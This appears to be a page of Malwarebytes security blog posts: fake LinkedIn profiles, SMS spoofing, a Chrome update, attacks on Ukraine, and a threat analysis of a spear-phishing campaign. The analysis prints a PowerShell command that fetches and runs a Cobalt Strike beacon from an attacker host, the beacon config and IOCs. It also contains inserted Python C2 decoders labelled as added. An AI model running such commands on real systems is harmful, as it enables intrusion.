IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

Watch out for LinkedIn fakes who want to get connected

Despite continued warnings of deepfake chaos during major events, things haven’t worked out the way some thought. Those video deepfakes are bad, and they remain bad. Quite simply, nobody is fooled – or at least, nobody able to make a mistaken snap judgement in a way that matters.

As much as we over-dramatise their use in our heads, the video aspect of deepfaking has a long way to go to pull the proverbial wool over our eyes. But it’s a little bit harder to spot an AI-generated image, as you can see on sites such as This Person Does Not Exist, and some people are using these fake images on social media.

When LinkedIn connections go wrong

Two Stanford University researchers, Renée DiResta and Josh Goldstein, have found more than 1,000 fake LinkedIn profiles using AI-generated faces.

The story begins with someone sending a message to an individual on LinkedIn. Nothing odd there, except the recipient happens to know their way around AI generated images.

The avatar attached to the profile did indeed turn out to be entirely fictitious; “Keenan Ramsey” does not exist. From there, the pretend people were unearthed doing their thing on LinkedIn.

These “employees” were tagged under various businesses, except those businesses said they didn’t authorize the use of computer generated profile imagery. The researchers digging into this discovered companies selling LinkedIn marketing services. They also offered bot/avatar accounts, which is a no-no from LinkedIn’s perspective.

The long tail of deepfake marketing

It’s somewhat bizarre that people may be making money from selling web generated profile pictures to businesses that could just do it themselves given 10 seconds and a web browser. It’s also bizarre that nobody at any point in this daisy-chain of fake people’s profiles seems to know exactly where, or how, or why any of this has been happening. Who is responsible? What are these accounts doing besides perhaps bolstering employee count numbers?

A very good question.

For now, it may be worth paying close attention to random messages and/or connection requests on LinkedIn. Is the person at the other end who they claim to be, or a business-realm fakeout? It may be tricky to pin down a conclusive answer, but I’d definitely rather know just who is wanting to get inside my connections network…and why.

The post Watch out for LinkedIn fakes who want to get connected appeared first on Malwarebytes Labs.

“A little gift for you” SMS spam appears to come from your own phone number

If you’ve received a spam SMS message sent from your own phone number, don’t panic.

No, you weren’t hacked. And you’re not the only one who has received such a message, which looks a bit like this:

A colleague received this same spam SMS message that has been going around more frequently these past few days. (Source: Malwarebytes)

Free Msg: Your bill is paid for March. Thanks, here’s a little gift for you: {redacted link}

But why do they make it look like the text has come from your own number? It’s likely the scammers spoofed it in order to get past built-in filter features, which don’t block messages you send yourself.

The Verge writer Chris Welch said that clicking the link directed him to Channel One Russia, a Russian state media network. But this could have easily led to nefarious payloads, like malware, and some have already classed this as a smishing (or “SMS phishing”) attempt.

Interestingly, Welch said, the texts appear to be targeting users of Verizon Wireless, one of the biggest telecommunication companies in the US. 9to5Mac’s Allison McDaniel says she’s also seen customers of Visible, Verizon’s MVNO (mobile virtual network operator), complain about the spam SMS on Reddit, too.

Rich Young, Verizon’s spokesperson, said in an email to The Verge:

“Verizon is aware that bad actors are sending spam text messages to some customers which appear to come from the customers’ own number. Our team is actively working to block these messages, and we have engaged with US law enforcement to identify and stop the source of this fraudulent activity. Verizon continues to work on behalf of the customer to prevent spam texts and related activity.”

McDaniel has advised Verizon and Visible users to report receiving this spam SMS—and others like it—to the FCC by filing a complaint. Pay particular attention to the bit on “Your Number is Being Spoofed.” You can also forward the message to SPAM (7726).

Tell your friends and family about this smishing attack. If they received one, tell them to report it, delete it and move on.

The post “A little gift for you” SMS spam appears to come from your own phone number appeared first on Malwarebytes Labs.

Update now! Google launches Chrome version 100 and fixes 28 vulnerabilities

Google has launched Chrome version 100 which, among other things, fixes 28 vulnerabilities. Other new security features include Safety Check, Enhanced Safe Browsing, and the ability to control website access to your location and device.

Of the 28 vulnerabilities, none have been marked as critical but 9 have been marked as high severity. High severity usually means that any compromise would be limited to the browser, although vulnerabilities that allow an escape from the browser’s sandbox will often be classified as High as well. But these vulnerabilities could have more serious consequences when used in conjunction with others, so it warrants a quick update.

Version 100

We have talked about possible user-agent string problems with the introduction of version 100, for both Chrome and Firefox. With Google Chrome 100, the browser’s user-agent string now uses a three-digit version number compared to a two-digit number. After testing showed that some sites had issues with the new user-agent string, they were quickly fixed by developers so these sites now support the three-digit version. This is not to say that every site has been tested, so it may still cause problems for some.

Google has announced that Chrome 100 will be the last version of the browser with an unlimited user-agent string. The user-agent string—which is sent out on each HTTP request—contains information about the user’s OS, the browser used and its version number, the device model, the architecture, and more. With this combination of parameters and the large variety of potential values, it could be possible to identify internet users based on their user-agent strings.

To reduce this fingerprinting vector, Google plans to reduce the information in the user-agent string to only the browser’s brand and significant version, whether it is a desktop or mobile build, and the platform it’s running on.

Safety check

The new safety check allows users to quickly check a few security settings like available updates, the strength of their saved passwords, whether safe browsing is enabled, and more.

Go to your Settings and then select Security and Privacy. Here you can click the Check now button under Safety check.


Enhanced Safe Browsing

According to Google, Enhanced Safe Browsing protection adds a few extra layers to the standard protection:

  • Predicts and warns you about dangerous events before they happen
  • Keeps you safe on Chrome and may be used to improve your security in other Google apps when you are signed in
  • Improves security for you and everyone on the web
  • Warns you if passwords are exposed in a data breach
  • Sends URLs to Safe Browsing to check them. Also sends a small sample of pages, downloads, extension activity, and system information to help discover new threats. Temporarily links this data to your Google Account when you’re signed in, to protect you across Google apps.

It is up to you whether you would like to provide Google with this data, but you can enable Enhanced Safe Browsing by following the procedure outlined below.

Go to Settings and then select Security and Privacy. Click Security and select the Enhanced protection radio button.

Control website access to your location and device

Sometimes websites ask permission to use your location, microphone, and more. Chrome now has site safety controls that help you understand and change the permissions for the sites you visit.

You can check the current permissions by clicking the lock symbol in the address bar and selecting Site settings to see an overview of all the permissions. You will also see existing permissions, which you can simply reset by using the Reset permissions button.


New developer APIs

With this release, Google has also added the Digital Goods API so that web applications can make in-app purchases using the Google Play Store. This API has been made available alongside the Multi-Screen Window Placement API, which extends the web platform’s single-screen paradigm to support multi-screen devices. As multi-screen devices and applications become a more common part of user experiences, it is deemed important to give web developers information and tools to leverage that expanded visual environment.

How to update Chrome

The easiest way to update Chrome is to allow it to update automatically, which basically uses the same method as outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.

So, it doesn’t hurt to check now and then. My preferred method is to have Chrome open the page chrome://settings/help which you can also find by clicking Settings > About Chrome.

If there is an update available, Chrome will notify you and start downloading it.


Then all you have to do is relaunch the browser in order for the update to complete.

Chrome is up to date

After the update, the version should be 100.4896.60.

Stay safe, everyone!

The post Update now! Google launches Chrome version 100 and fixes 28 vulnerabilities appeared first on Malwarebytes Labs.

Looking over your shoulder: when small mistakes have big consequences

People up to no good get themselves caught in an endless number of ways. This has always been the case in the real world, and continues to be true online. No matter how talented, how daring the schemes, greed and the desire for fame often win out. This has disastrous consequences for those caught, and a little more illumination for those of us taking part or watching from the sidelines.

Anybody can be caught in the act. Even groups with near mythical levels of skillset-cred fall by the wayside. It is, in the words of one Agent Smith, inevitable.

Well, occasionally inevitable.

The ever-shifting sands of “I’ve made a terrible mistake”

A recent article over on ITPro highlights some of the ways would-be cybercriminals and those at the more professional end of data snatching get themselves caught. So-called script kiddies can take a couple of weeks; big name groups can take longer, but they can still fall foul of the smallest mistake.

Some of the most common mistakes listed in the article are combinations of technical misfire, greed, lack of skill, and unfamiliarity with social engineering. How can things go wrong for the unwary? Let’s take a look.

Technological mishaps

Something we see happening is tiny slices of technology causing major ripples in unexpected ways. A person may have a great plan, a plan B, and a bunch of other what-ifs and workarounds. It all comes undone in the most unexpected of ways. If the founder of the infamous Silk Road can run into problems with VPNs, so can anyone.

Even if the VPN doesn’t glitch out at the worst possible moment exposing an IP address, forgetting to switch it on in the first place can give the same end result. Many years ago, a fairly prolific defacer of websites I was tracking fell foul of this problem. They became addicted to the rush of posting their latest compromises to a hacking forum dishing out kudos points for cool hacks.

Their lack of skill beyond the basics coupled with the fame rush resulted in a forum hack from their college network, with the VPN switched off. I’m still unsure if the hack they used was misused somehow and resulted in their IP posted to the defaced page, or this was revenge from the admins. Either way, enough pieces of the puzzle were available that this individual ran into trouble shortly after and ended their defacement activities. 

Oh no, my trophy storage

People involved in compromise, defacement, and other actions simply cannot help themselves with a bit of showing off. It stands to reason that those with this inclination end up assembling a large trophy case marked as “all the evidence goes here”. This trophy storage may take the form of a list of site defacements posted to a forum. It may be on passwordless server storage running off their home network. It might even just be a collection of zipfiles in cloud storage somewhere.

Other times, it may be files grabbed by malware and uploaded to a server with no encryption or passwords applied. It’s left to sit around for the longest time. Once law enforcement comes knocking, it’s likely too late for the accused to do anything about it.

When makeovers go horribly wrong

Back in the Myspace days, we’d sometimes see someone take their first steps into the defacement scene with a revamp of their personal profile. Where once it contained their name, location, and home photographs, it now looked very much like someone had just watched Hackers and decided to HACK THE PLANET.

Unfortunately for them, they didn’t know about the existence of search engine caches, or services like Internet Archive. They also failed to consider the dozens of messages in the comments section calling them by name. This is partially one reason why smarter people in the Myspace hacking scene would place their top friends outside of the top friends box, and place random people there instead.

Even without technical mishaps or overflowing trophy cabinets, there are other ways to fall on your own sword composed of ones and zeroes. The social aspect of underground forums often leads to people letting their guard down. A bit too much information shared, a little too friendly in the direct messages, and it all adds up.

Revealing too much information about yourself on forums and in chat, posting in bragging threads where you display your best hacks, can lead to disaster. Other people caught by law enforcement can turn informer, and socially engineer details from individuals who feel they’re in a safe, relaxed environment.

Turning the tables

The forums themselves can suddenly switch from safe-haven to massive bearpit of law enforcement pandemonium. Some underground forums have a very strict no-spam policy. They strengthen this stance in what may sound like very surprising ways. Some refuse to allow users to login via proxies or VPNs. That’s right: they need to use their actual IP address. How do you think this pans out if the forum is taken over by the authorities? Or simply compromised by somebody for giggles with the forum logs dumped into the wild?

The other suspicion is that any supposed underground forum demanding real world information could well be a sting operation. How does someone ever really know before they sign up?

It’s a dog eat dog world out there

If someone avoids spilling too many beans or posting incriminating information, it can still go wrong. As we’ve seen recently, little fish are tasty treats for more experienced hands. People regularly post hacking tools and phish kits to dedicated forum sections. Every so often, we see someone drop a booby-trap onto a site and gobble up all the data from compromised forum-goers.

This isn’t new, and neither are any of the other pitfalls and mishaps listed above. Even so, overenthusiastic forum-goers will keep walking into them and providing headlines for years to come. Is it really worth the worry?

The post Looking over your shoulder: when small mistakes have big consequences appeared first on Malwarebytes Labs.

Attacks on Ukraine communications are a major part of the war

Since the start of the Russian invasion of Ukraine, the war on the battlefield has been accompanied by cyber attacks. Those attacks against critical infrastructure have knocked out banking and defense platforms, mostly by targeting several communication systems.

In a timeline set up by NetBlocks, you can follow individual attacks on communication services, starting Thursday 24 February 2022, the same day the invasion of Ukraine started. The attack methods are very diverse, as are the consequences.

But that wasn’t the start of it: the denial of service attacks that were clear attempts to disrupt banking and defense services began earlier, and a huge drop in connectivity was noticed as early as February 15, 2022.

NetBlocks

NetBlocks is a global Internet monitor based in London. It uses “diffscans”, which map the IP address space of a country in real time, and show Internet connectivity levels and corresponding outages. Deliberate Internet outages will often show a distinct network pattern, and NetBlocks uses those patterns to determine and attribute the root cause of an outage.

The NetBlocks timeline shows disruptions of fixed-line service provider Triolan, the Viasat satellite internet network, backbone internet provider GigaTrans, network operator Kyivstar, the Vinasterisk network, as well as targeted attacks on certain areas that were often accompanied or followed by physical strikes.

Financial problems have also presented challenges for network operators. On Tuesday 15 March, internet provider LocalNet announced that it would have to lock down subscribers with debt on their account due to difficulty paying the company’s own bills.

On Monday 28 March 2022, Ukraine’s national provider Ukrtelecom experienced an extended, nation-scale network disruption, following a major cyberattack. It’s not yet known whether Ukrtelecom—a telephone, internet and mobile provider—was hit by a distributed denial of service (DDoS) attack or a deeper, more sophisticated intrusion. But NetBlocks stated that the gradual loss of connectivity was a giveaway that it wasn’t a power or cable cut.

Communications

As we have said in the past, communication systems are a vital infrastructure. Important decisions may be postponed when the person or body that is supposed to make that decision is unable to gather the information necessary. This is also why we see a lot of misinformation and disinformation on both sides of the conflict.

The ongoing conflict has also affected radiation monitoring, communications, and long-term maintenance and cleanup efforts at nuclear power plants across Ukraine, which is an extra worrying factor. The loss of communications was subsequently raised as a point of concern by the International Atomic Energy Agency.

Methods of disruption

When it comes to disrupting communications services the methods are as diverse as the means of communication. Communication lines and infrastructure include physical lines, satellites, and other wireless methods.

Physical lines can be cut off in physical attacks, but they are also vulnerable to the cyberattacks that can be used against wireless communications.

  • An unwanted wireless signal injected into the original signal may result in a temporary loss of wireless signals, poor receiver performance, or bad quality of output by the electronic equipment.
  • Channel interferences influencing the performance of wireless communication systems can be co-channel interferences or adjacent channel interferences.
  • Overload attacks, like DDoS attacks, are designed to overwhelm the available capacity of the infrastructure or absorb so much capacity that the negative influence on the service is notable.
  • Attacks on physical components like cables, switches, routers, and network centers.

As we discussed recently, even our networks of satellites and space systems are vulnerable to cyberattacks, which can create a backdoor into the physical and digital systems we rely upon on a daily basis.

DDoS

A tried and tested method to disrupt communications is to overload the network(s) with a Distributed Denial of Service (DDoS) attack. This type of attack involves sending large amounts of traffic from multiple sources to a service or website, intending to overwhelm it.

One DDoS method that was used against Ukrainian websites was via hundreds of compromised WordPress sites that use visitors’ browsers to perform DDoS attacks by means of an inserted malicious script. The DDoS attacks will occur in the background without the user knowing it’s happening, other than a slowdown of their browser. BleepingComputer discovered that the same script is being used by a pro-Ukrainian site to conduct attacks on Russian websites.

Incommunicado

The cyberattacks on communications are an understandable part of modern warfare. And one that nations and international organizations should prepare for. But, as always, these attacks have consequences for the inhabitants of the countries that are at war.

On both sides of the conflict, people have been cut off from communications. On the Russian side people have been denied access to most social media, which they have been trying to circumvent by using VPNs. But what is way worse from a human perspective is that worried Ukrainians are unable to reach their relatives in areas that are under attack.

The post Attacks on Ukraine communications are a major part of the war appeared first on Malwarebytes Labs.

New spear phishing campaign targets Russian dissidents

This blog post was authored by Hossein Jazi.

Updated to clarify the two different campaigns (Cobalt Strike and Rat)

Several threat actors have taken advantage of the war in Ukraine to launch a number of cyber attacks. The Malwarebytes Threat Intelligence team is actively monitoring these threats and has observed activities associated with the geopolitical conflict.

More specifically, we’ve witnessed several APT actors such as Mustang Panda, UNC1151 and SCARAB that have used war-related themes to target mostly Ukraine. We’ve also observed several different wipers and cybercrime groups such as FormBook using the same tactics. Besides those known groups, we saw an actor that used multiple methods to deploy variants of Quasar Rat. These methods include using documents that exploit CVE-2017-0199 and CVE-2021-40444, macro-embedded documents, and executables.

On March 23, we identified a new campaign that instead of targeting Ukraine is focusing on Russian citizens and government entities. Based on the email content it is likely that the threat actor is targeting people that are against the Russian government.

The spear phishing emails are warning people that use websites, social networks, instant messengers and VPN services that have been banned by the Russian Government and that criminal charges will be laid. Victims are lured to open a malicious attachment or link to find out more, only to be infected with Cobalt Strike.

Spear phishing as the main initial infection vector

These emails pretend to be from the “Ministry of Digital Development, Telecommunications and Mass Communications of the Russian Federation” and “Federal Service for Supervision of Communications, Information Technology and Mass Communications” of Russia.

We have observed two documents associated with this campaign that both exploit CVE-2021-40444. Even though CVE-2021-40444 has been used in a few attacks in the past, to the best of our knowledge this was the first time we observed an attacker use RTF files instead of Word documents to exploit this vulnerability. The actor also leveraged a new variant of this exploit called CABLESS in this attack. Sophos has reported an attack that used a CABLESS variant of this exploit, but in that case the actor did not use an RTF file and instead prepended the WSF data to a RAR file.

  • Email with RTF file:
    • Федеральная служба по надзору в сфере связи, информационных технологий и массовых коммуникаций (Federal Service for Supervision of Communications, Information Technology and Mass Communications)
    • Предупреждение! Министерство цифрового развития, связи и массовых коммуникаций Российской Федерации (A warning! Ministry of Digital Development, Telecommunications and Mass Media of the Russian Federation)

Figure 1: Phishing template

Figure 2: Phishing template

  • Email with archive file:
    • информирование населения об критических изменениях в сфере цифровых технологий, сервисов, санкций и уголовной ответственности за их использование. (Informing the public about critical changes in the field of digital technologies, services, sanctions and criminal liability for their use.)
    • Внимание! Информирует Министерство цифрового развития, связи и массовых коммуникаций Российской Федерации (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)

Figure 3: Phishing template

  • Email with link:
    • Внимание! Информирует Министерство цифрового развития, связи и массовых коммуникаций Российской Федерации (Attention! Informs the Ministry of Digital Development, Communications and Mass Media of the Russian Federation)

Figure 4: Phishing template

Victimology

The actor sent its spear phishing emails to people with email addresses on these domains:

mail.ru, mvd.ru, yandex.ru, cap.ru, minobr-altai.ru, yandex.ru, stavminobr.ru, mon.alania.gov.ru, astrobl.ru, 38edu.ru, mosreg.ru, mo.udmr.ru, minobrnauki.gov.ru, 66.fskn.gov.ru, bk.ru, ukr.net

Based on these domains, here is the list of potential victims:

  • Portal of authorities of the Chuvash Republic (official Internet portal)
  • Russian Ministry of Internal Affairs
  • Ministry of Education and Science of the Republic of Altai
  • Ministry of Education of the Stavropol Territory
  • Minister of Education and Science of the Republic of North Ossetia-Alania
  • Government of Astrakhan Region
  • Ministry of Education of the Irkutsk Region
  • Portal of state and municipal services of the Moscow Region
  • Ministry of Science and Higher Education of the Russian Federation

Analysis

The lures used by the threat actor are in Russian language and pretend to be from Russia’s “Ministry of Information Technologies and Communications of the Russian Federation” and “MINISTRY OF DIGITAL DEVELOPMENT, COMMUNICATIONS AND MASS COMMUNICATIONS”. One of them is a letter about limitation of access to Telegram application in Russia.

Figure 5: Lure letter

Figure 6: Lure template

These RTF files contain an embedded URL that downloads an HTML file, which exploits the vulnerability in the MSHTML engine:
http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html

The HTML file contains a script that executes the script in the WSF data embedded in the RTF file.

Figure 7: HTML file

The actor has added WSF (Windows Script File, run by Windows Script Host) data at the start of the RTF file. As you can see from Figure 8, the WSF data contains JScript code that can be accessed from a remote location. In this case the data has been accessed using the downloaded HTML exploit file.

Figure 8: WSF data

Executing this script spawns PowerShell, which downloads a CobaltStrike beacon from the remote server and executes it on the victim’s machine. (The deployed CobaltStrike file name is Putty.)

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'http://wallpaper.skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe' -OutFile $env:TEMP\putty.exe; . $env:TEMP\putty.exe; Start-Sleep 15

The following shows the CobaltStrike config:

{
  "BeaconType": [
    "HTTPS"
  ],
  "Port": 443,
  "SleepTime": 38500,
  "MaxGetSize": 1398151,
  "Jitter": 27,
  "C2Server": "wikipedia-book.vote,/async/newtab_ogb",
  "HttpPostUri": "/gen_204",
  "Malleable_C2_Instructions": [
    "Remove 17 bytes from the end",
    "Remove 32 bytes from the beginning",
    "Base64 URL-safe decode"
  ],
  "SpawnTo": "/4jEZLD/DHKDj1CbBvlJIg==",
  "HttpGet_Verb": "GET",
  "HttpPost_Verb": "POST",
  "HttpPostChunk": 96,
  "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe",
  "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe",
  "CryptoScheme": 0,
  "Proxy_Behavior": "Use IE settings",
  "Watermark": 1432529977,
  "bStageCleanup": "True",
  "bCFGCaution": "True",
  "KillDate": 0,
  "bProcInject_StartRWX": "True",
  "bProcInject_UseRWX": "False",
  "bProcInject_MinAllocSize": 16700,
  "ProcInject_PrependAppend_x86": [
    "kJCQ",
    "Empty"
  ],
  "ProcInject_PrependAppend_x64": [
    "kJCQ",
    "Empty"
  ],
  "ProcInject_Execute": [
    "ntdll.dll:RtlUserThreadStart",
    "SetThreadContext",
    "NtQueueApcThread-s",
    "kernel32.dll:LoadLibraryA",
    "RtlCreateUserThread"
  ],
  "ProcInject_AllocationMethod": "NtMapViewOfSection",
  "bUsesCookies": "True",
  "HostHeader": ""
}
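A small decoder for the Malleable C2 transform listed under Malleable_C2_Instructions above, as an added example that is not part of the original post or of Cobalt Strike itself: it applies the three instruction strings, verbatim from the config, in order to a captured HTTP response body to recover the (still encrypted) task blob, and reports whether a body is even shaped like this transport. The inverse transform exists only to construct a sample response; the filler bytes and sample task are invented.

```python
import base64
import binascii
import re

# Instruction strings exactly as listed in the parsed beacon config above.
# The beacon applies them in this order to each HTTP response body; what is
# left is the encrypted task blob (decryption needs the beacon's key, not shown).
MALLEABLE_C2_INSTRUCTIONS = [
    "Remove 17 bytes from the end",
    "Remove 32 bytes from the beginning",
    "Base64 URL-safe decode",
]

REMOVE_RE = re.compile(r"^Remove (\d+) bytes from the (end|beginning)$")


def apply_instruction(data: bytes, instruction: str) -> bytes:
    """Apply one transform step; raise ValueError if the body cannot be this transport format."""
    m = REMOVE_RE.match(instruction)
    if m:
        count, where = int(m.group(1)), m.group(2)
        if count > len(data):
            raise ValueError(f"body too short for '{instruction}'")
        return data[: len(data) - count] if where == "end" else data[count:]
    if instruction == "Base64 URL-safe decode":
        # Profiles commonly strip '=' padding; restore it, then decode strictly
        # so a body with characters outside the URL-safe alphabet is rejected.
        padded = data + b"=" * (-len(data) % 4)
        standard = padded.replace(b"-", b"+").replace(b"_", b"/")
        try:
            return base64.b64decode(standard, validate=True)
        except binascii.Error as exc:
            raise ValueError("body is not URL-safe Base64") from exc
    raise ValueError(f"unsupported instruction: {instruction}")


def recover_task_data(body: bytes, instructions=MALLEABLE_C2_INSTRUCTIONS) -> bytes:
    """Undo the server-side transform to get the encrypted task blob the beacon would see."""
    for instruction in instructions:
        body = apply_instruction(body, instruction)
    return body


def looks_like_beacon_transport(body: bytes, instructions=MALLEABLE_C2_INSTRUCTIONS) -> bool:
    """True if the body survives every step (length and alphabet checks) of this profile."""
    try:
        recover_task_data(body, instructions)
        return True
    except ValueError:
        return False


def wrap_like_server(task: bytes, instructions=MALLEABLE_C2_INSTRUCTIONS, filler: bytes = b"x") -> bytes:
    """Inverse of recover_task_data; used here only to construct sample traffic for the demo."""
    for instruction in reversed(instructions):
        m = REMOVE_RE.match(instruction)
        if m:
            count, where = int(m.group(1)), m.group(2)
            pad = filler * count
            task = task + pad if where == "end" else pad + task
        elif instruction == "Base64 URL-safe decode":
            task = base64.urlsafe_b64encode(task).rstrip(b"=")
        else:
            raise ValueError(f"unsupported instruction: {instruction}")
    return task


if __name__ == "__main__":
    # Constructed stand-in for an encrypted task blob (real ones are AES-encrypted).
    sample_task = b"\x00\x01encrypted-task-blob"
    response_body = wrap_like_server(sample_task)
    print(len(response_body), "byte response ->", recover_task_data(response_body))
```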

Similar lure used by another actor

We also have identified activity by another actor that uses a similar lure as the one used in the previously mentioned campaign. This activity is potentially related to Carbon Spider and uses “Федеральная служба по надзору в сфере связи, информационных технологий и массовых коммуникаций” (Federal Service for Supervision of Communications, Information Technology and Mass Communications) of Russia as a template. In this case, the threat actor has deployed a PowerShell-based Rat.

Figure 9: Template

The dropped PowerShell script is obfuscated using a combination of Base64 and custom obfuscation.

Figure 10: Dropped PS script

After deobfuscating the script, you can see the Rat deployed by this actor. This PowerShell based Rat has the capability to get the next stage payload and execute it. The next stage payload can be one of the following file types:

  • JavaScript
  • PowerShell
  • Executable
  • DLL

All of its communications with its server are in Base64 format. This Rat starts its activity by setting up some configuration values, which include the C2 URL, intervals, debug mode and a parameter named group that is initialized with “Madagascar”, which is probably the alias of the threat actor.

After setting up the configuration, it calls the “Initialize-Engine” function. This function collects the victim’s info, including OS info, username, hostname, BIOS info and a host-domain value that shows whether the machine is a domain member or not. It then joins all the collected info into a string separated by the “|” character and, at the end, adds the group name and the API config value. The created string is sent to the server using the Send-WebInit function. This function adds the “INIT%%%” string to the created string, Base64-encodes it and sends it to the server.

Figure 11: PowerShell Rat

After performing the initialization, it goes into a loop that keeps calling the “Invoke-Engine” function. This function checks for incoming tasks from the server, decodes them and calls the proper function to execute the incoming task. If there is no task to execute, it sends “GETTASK%%” in Base64 format to its server to show it is ready to get tasks and execute them. The “IC” command is used to delete itself.

Figure 12: Invoke task

The result of the task execution is sent to the server using the “PUTTASK%%” command.
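A defender-side decoder for the beacon format described in the preceding paragraphs, as an added example that is not part of the original post or of the actor’s script: it Base64-decodes captured POST bodies, classifies them by the INIT%%%, GETTASK%% and PUTTASK%% markers, splits an INIT check-in on “|” into the fields the write-up lists, and flags hosts that check in and then poll repeatedly. Treating each marker as a prefix, the field order, the proxy log line format and every sample value except the group name are assumptions.

```python
import base64
import binascii
import re
from dataclasses import dataclass, field

# Markers quoted in the write-up. Assumption: each marker is a prefix of the
# plaintext, and the whole plaintext is Base64-encoded before being sent.
INIT_MARKER = "INIT%%%"
GETTASK_MARKER = "GETTASK%%"
PUTTASK_MARKER = "PUTTASK%%"

# Assumed order of the "|"-separated INIT fields, following the write-up:
# OS info, username, hostname, BIOS info, host-domain flag, group, API config.
INIT_FIELDS = ("os", "user", "host", "bios", "domain_member", "group", "api")

# Constructed proxy log format (not from the article): "<ts> <src> POST <url> body=<b64>".
LOG_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) POST (?P<url>\S+) body=(?P<body>\S+)$")


@dataclass
class BeaconMessage:
    kind: str                      # "INIT", "GETTASK", "PUTTASK" or "UNKNOWN"
    body: str                      # decoded text after the marker ("" if not decodable)
    fields: dict = field(default_factory=dict)


def decode_b64_text(b64: str):
    """Strict Base64 decode to text; None if the body is not Base64 or not UTF-8."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def classify(b64: str) -> BeaconMessage:
    """Map one POST body to a beacon message kind, parsing INIT fields when present."""
    text = decode_b64_text(b64)
    if text is None:
        return BeaconMessage("UNKNOWN", "")
    for kind, marker in (("INIT", INIT_MARKER), ("GETTASK", GETTASK_MARKER), ("PUTTASK", PUTTASK_MARKER)):
        if text.startswith(marker):
            body = text[len(marker):]
            fields = dict(zip(INIT_FIELDS, body.split("|"))) if kind == "INIT" else {}
            return BeaconMessage(kind, body, fields)
    return BeaconMessage("UNKNOWN", text)


def scan_proxy_log(lines):
    """Return {src: [BeaconMessage, ...]} for log lines whose body decodes to a beacon message."""
    seen = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        msg = classify(m.group("body"))
        if msg.kind != "UNKNOWN":
            seen.setdefault(m.group("src"), []).append(msg)
    return seen


def beaconing_hosts(seen, min_polls=3):
    """Hosts that sent an INIT check-in and then polled with GETTASK at least min_polls times."""
    hits = []
    for src, msgs in seen.items():
        kinds = [m.kind for m in msgs]
        if "INIT" in kinds and kinds.count("GETTASK") >= min_polls:
            hits.append(src)
    return sorted(hits)


def b64_text(text: str) -> str:
    """Base64-encode a text string the way the Rat does before sending it."""
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


# Constructed sample traffic. Hosts, URLs and field values are invented; only the
# markers, the "|" separator and the group name "Madagascar" come from the write-up.
INIT_PLAINTEXT = "Microsoft Windows 10 Pro|alice|WS-0042|Dell Inc. 1.4.1|True|Madagascar|v1"
SAMPLE_LOG = [
    "2022-03-25T14:37:47Z 10.0.0.5 POST http://rat-c2.invalid/gate body=" + b64_text(INIT_MARKER + INIT_PLAINTEXT),
    "2022-03-25T14:38:02Z 10.0.0.5 POST http://rat-c2.invalid/gate body=" + b64_text(GETTASK_MARKER),
    "2022-03-25T14:38:17Z 10.0.0.9 POST http://intranet.invalid/api body=" + b64_text("hello"),
    "2022-03-25T14:38:32Z 10.0.0.5 POST http://rat-c2.invalid/gate body=" + b64_text(GETTASK_MARKER),
    "2022-03-25T14:38:47Z 10.0.0.5 POST http://rat-c2.invalid/gate body=" + b64_text(PUTTASK_MARKER + "whoami: ws-0042\\alice"),
    "2022-03-25T14:39:02Z 10.0.0.5 POST http://rat-c2.invalid/gate body=" + b64_text(GETTASK_MARKER),
    "2022-03-25T14:39:17Z 10.0.0.9 POST http://intranet.invalid/api body=form=1&x=2",
]

if __name__ == "__main__":
    seen = scan_proxy_log(SAMPLE_LOG)
    for src in beaconing_hosts(seen):
        init = next(m for m in seen[src] if m.kind == "INIT")
        print(f"{src}: group={init.fields.get('group')} host={init.fields.get('host')}")
```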

Infrastructure

The following shows the infrastructure used by this actor highlighting that the different lures are all connected.

Figure 12: Infrastructure

The Malwarebytes Threat Intelligence team continues to monitor cyber attacks related to the Ukraine war. We are protecting our customers and sharing additional indicators of compromise.

IOCs

RTF files host domain:
digital-ministry[.]ru
RTF files:
PKH telegram.rtf
b19af42ff8cf0f68e520a88f40ffd76f53a27dffa33b313fe22192813d383e1e
PKH.rtf
38f2b578a9da463f555614e9ca9036337dad0af4e03d89faf09b4227f035db20
MSHTML exploit:
wallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/exploit.html
4e1304f4589a706c60f1f367d804afecd3e08b08b7d5e6bd8c93384f0917385c
CobaltStrike Download URL:
wallpaper[.]skin/office/updates/GtkjdsjkyLkjhsTYhdsd/putty.exe
CobaltStrike:
Putty.exe
d4eaf26969848d8027df7c8c638754f55437c0937fbf97d0d24cd20dd92ca66d
CobaltStrike C2:
wikipedia-book[.]vote/async/newtab_ogb
Macro based maldoc:
c7dd490adb297b7f529950778b5a426e8068ea2df58be5d8fd49fe55b5331e28
PowerShell based RAT:
9d4640bde3daf44cc4258eb5f294ca478306aa5268c7d314fc5019cf783041f0
PowerShell RAT C2:
swordoke[.]com

The post New spear phishing campaign targets Russian dissidents appeared first on Malwarebytes Labs.

Satellites are critical infrastructure and need to be cybersecured

In the context of this article we will use the term satellite for a machine that is launched into space and moves around Earth. And there might be a lot more of them than you would expect—this live map tracks a huge number of satellites.

Originally most of earth’s satellites were launched for scientific reasons. Some because of their unique ability to provide a view of a large area of the earth’s surface, and others because they are able to study space without having to deal with the atmosphere.

Today, a majority of the satellites in orbit are used in some form of communication. That’s not surprising when you consider that Elon Musk’s SpaceX is by far the largest operator of satellites. In September 2021, the total number of satellites amounted to 4550, with 1655 of them belonging to SpaceX. SpaceX’s Starlink satellite Internet program plans to send more than a thousand new satellites into orbit every year.

Commercial satellites, like Starlink, provide us with the ability to have things like Internet access, television, GPS, and scientific information about the weather and other processes in the atmosphere and on the surface.

CISA

On March 17, 2022, the Cybersecurity & Infrastructure Security Agency (CISA) published an alert in conjunction with the Federal Bureau of Investigation (FBI) which warned of possible threats to US and international satellite communication (SATCOM) networks.

